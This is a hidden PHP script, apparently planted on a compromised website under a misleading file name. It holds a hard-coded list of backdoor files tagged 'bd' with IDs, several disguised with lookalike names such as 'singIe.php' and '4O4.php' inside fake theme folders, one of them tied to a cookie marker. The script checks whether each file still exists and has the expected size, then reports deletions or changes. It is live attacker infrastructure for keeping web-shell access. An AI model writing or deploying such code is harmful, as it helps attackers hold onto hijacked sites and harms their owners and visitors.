File: /services/webpages/a/b/absolutespace.ca/public/.ibase_pconnection
<?php $r = '/services/webpages/a/b/absolutespace.ca/public'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php"=>"bd@@52448@@$_COOKIE[7",
"/class.soap_fault.php"=>"bd@@272642@@1059",
"/data_global.php"=>"bd@@174360@@602",
"/mcrypt.lib.php"=>"bd@@196634@@619",
"/8b58fe.php"=>"bd@@17437@@105",
"/wp-content/themes/custom-file-4-1748020209/portfolio.php"=>"bd@@361511@@589",
"/0dc313.php"=>"bd@@87382@@105",
"/stats_customers.php"=>"bd@@209768@@536",
"/wp-content/themes/front_page_template_1747900552/singIe.php"=>"bd@@215690@@731",
"/mod_joomulus.php"=>"bd@@321162@@1040",
"/wp-content/themes/error_404_1748027280/4O4.php"=>"bd@@262561@@727",
"/reports.php"=>"bd@@140713@@537",
"/EnumToCSS.php"=>"bd@@344754@@1022",
"/banner_daily.php"=>"bd@@242143@@534",
"/wp-content/themes/custom-file-4-1748020209/archlve.php"=>"bd@@256764@@727"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');